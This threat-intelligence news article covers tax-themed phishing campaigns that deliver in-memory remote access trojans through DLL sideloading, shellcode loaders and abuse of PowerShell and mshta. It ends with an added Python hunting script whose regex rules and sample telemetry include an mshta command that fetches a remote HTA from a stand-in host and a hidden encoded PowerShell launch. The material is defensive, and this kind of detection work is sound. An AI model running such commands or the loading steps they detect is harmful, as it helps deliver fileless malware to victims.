Tax Phishing Emails Deliver In-Memory Malware to Windows Systems - gbhackers.com
By Mayura Kathir
June 10, 2026
Cybercriminals are leveraging tax-themed phishing emails to deploy sophisticated in-memory malware on Windows systems, bypassing traditional disk-based detection mechanisms.
The attack cascade begins when victims receive phishing emails containing malicious attachments disguised as official tax documents, W-2 forms, or rejected tax form notifications from legitimate entities like Intuit QuickBooks or HM Revenue & Customs.
When opened, these attachments trigger a multi-stage execution chain that never writes malicious code to disk. Instead, attackers leverage legitimate Windows administration tools including PowerShell, mshta.exe, and Windows Management Instrumentation to execute shellcode loaders entirely in memory.
The most recent campaigns attributed to threat actor Silver Fox specifically target Indian organizations and individuals, employing highly convincing tax-themed lures that mimic official communications from tax authorities.
The attack begins with a PDF attachment masquerading as an official tax document that redirects victims to a website serving a ZIP archive. Inside, an NSIS installer drops a legitimate signed binary alongside a malicious DLL, which loads through DLL hijacking to bypass security controls.
CYFIRMA said in a report shared with GBHackers that the latest campaigns, detected in early 2026, involve attackers impersonating tax agencies and financial organizations to steal sensitive information while delivering advanced remote access trojans entirely within system memory.
The malware further protects execution using LLVM-based Control Flow Flattening (CFF) and establishes persistent WebSocket-based Command-and-Control (C2) communication through HTTP protocol upgrades.
Attack Chain (Source: CYFIRMA).
The malicious DLL performs anti-debugging checks, disables Windows Update services, decrypts an embedded payload, and uses process injection to compromise legitimate Windows processes.
A shellcode loader generated via Donut wraps and executes the final payload entirely in memory, avoiding disk artifacts that antivirus solutions typically scan. The ultimate payload is a modular remote access trojan enabling keylogging, remote shell access, file transfer, and dynamic plugin execution.
In-memory malware, also called fileless malware, represents a critical evolution in attack techniques because it executes exclusively in system memory without creating persistent files on disk.
The static analysis identified SbieDll.dll as a 64-bit Portable Executable Dynamic Link Library (PE64 DLL) compiled for AMD64 architecture using Microsoft Visual C/C++ with Visual Studio 2022.
Static analysis results of SbieDll.dll using Detect It Easy (DiE), highlighting PE64 DLL architecture, packing and obfuscation indicators (Source: CYFIRMA).
This approach leverages living-off-the-land techniques where attackers use legitimate system tools to attain persistence through registry run keys and startup folders, making detection exceptionally challenging for security teams.
Proofpoint’s 2025 tax season report identified over 100 malicious operations impersonating tax agencies, with campaigns delivering Rhadamanthys malware, zgRAT, MetaStealer, XWorm, AsyncRAT, and VenomRAT.
Another campaign distributed Remcos RAT using fake tax documents, PowerShell scripts, and Microsoft shortcut files that silently execute malicious HTA files through mshta.exe.
Rather than creating a new thread through standard Windows APIs that are frequently monitored by Endpoint Detection and Response (EDR) solutions, the malware appears to execute shellcode through a COM IContextCallback::ContextCallback handler.
COM callback registration and execution handling logic (Source: CYFIRMA).
The Silver Fox campaign demonstrates multi-tier failover command-and-control communication with configurable beaconing intervals to reduce detection, while persisting through registry-based storage of components.
This campaign underscores how nation-state threat actors combine social engineering with advanced multi-stage malware techniques to target specific regional audiences.
Security teams should prioritize detection of anomalous execution patterns including unusual PowerShell usage, mshta.exe downloads, and DLL hijacking attempts.
Organizations must educate employees on recognizing phishing tactics during tax seasons, as these lures exploit urgency and fear regarding financial penalties.
Implementing application whitelisting, monitoring for living-off-the-land techniques, and deploying memory-scanning capabilities provide critical defense against these evasive attacks.
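The detection priorities above (unusual PowerShell usage, mshta.exe fetching remote content, and DLLs loaded from attacker-controlled paths) can be expressed as simple hunting rules over process-creation and image-load telemetry. The following is an added example written for this article, not CYFIRMA's or GBHackers' code; the events are constructed in a Sysmon-like shape, the paths and URL are invented, and the rule thresholds are assumptions a team would tune for its own environment.

```python
import re

# Constructed sample telemetry in a Sysmon-like shape (not real logs):
# id 1 = process creation, id 7 = image (DLL) load.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://tax-notice.example.invalid/w2.hta"},
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -EncodedCommand QUFBQUFBQUE="},
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Process"},
    {"id": 7, "image": r"C:\Users\u\AppData\Local\Temp\nsq1.tmp\signed_tool.exe",
     "loaded": r"C:\Users\u\AppData\Local\Temp\nsq1.tmp\SbieDll.dll", "signed": False},
    {"id": 7, "image": r"C:\Program Files\Tool\tool.exe",
     "loaded": r"C:\Windows\System32\kernel32.dll", "signed": True},
]

URL_RE = re.compile(r"https?://", re.I)                      # mshta pulling a remote HTA
ENC_RE = re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\b", re.I)
HIDE_RE = re.compile(r"-(nop|noprofile|w(indowstyle)?\s+hidden)", re.I)
# An unsigned DLL loaded from a user-writable directory is the classic sideload/hijack tell.
USER_WRITABLE_RE = re.compile(r"\\(Users\\[^\\]+\\(AppData|Downloads)|ProgramData|Temp)\\", re.I)

def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()

def check_event(ev):
    """Return the name of the first matching hunting rule, or None."""
    if ev["id"] == 1:
        name, cmd = image_name(ev["image"]), ev["cmdline"]
        if name == "mshta.exe" and URL_RE.search(cmd):
            return "mshta_remote_hta"
        if name in ("powershell.exe", "pwsh.exe") and ENC_RE.search(cmd) and HIDE_RE.search(cmd):
            return "encoded_hidden_powershell"
    elif ev["id"] == 7 and not ev["signed"] and USER_WRITABLE_RE.search(ev["loaded"]):
        return "unsigned_dll_from_user_writable_path"
    return None

def hunt(events):
    """Run every event through the rules; returns (rule, evidence) pairs."""
    hits = []
    for ev in events:
        rule = check_event(ev)
        if rule:
            hits.append((rule, ev.get("cmdline") or ev.get("loaded")))
    return hits

if __name__ == "__main__":
    print(hunt(SAMPLE_EVENTS))
```

The benign PowerShell and System32 image-load records are there to show the rules do not fire on ordinary activity; in production the same logic would run against exported Sysmon or EDR events rather than the inline list.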
The effectiveness of tax-themed attacks stems from victims expecting communications from authoritative organizations or worrying about fines for incorrectly submitted information.
As threat intelligence adapts to phishing-as-a-service platforms like RaccoonO365 deploying Remcos RATs and BruteRatel C4, defenders must evolve detection strategies beyond traditional file-based antivirus approaches.
INDICATORS OF COMPROMISE (IOCs)
Mayura Kathir (https://gbhackers.com/) is a cybersecurity reporter at GBHackers News, covering daily incidents including data breaches, malware attacks, cybercrime, vulnerabilities, zero-day exploits, and more.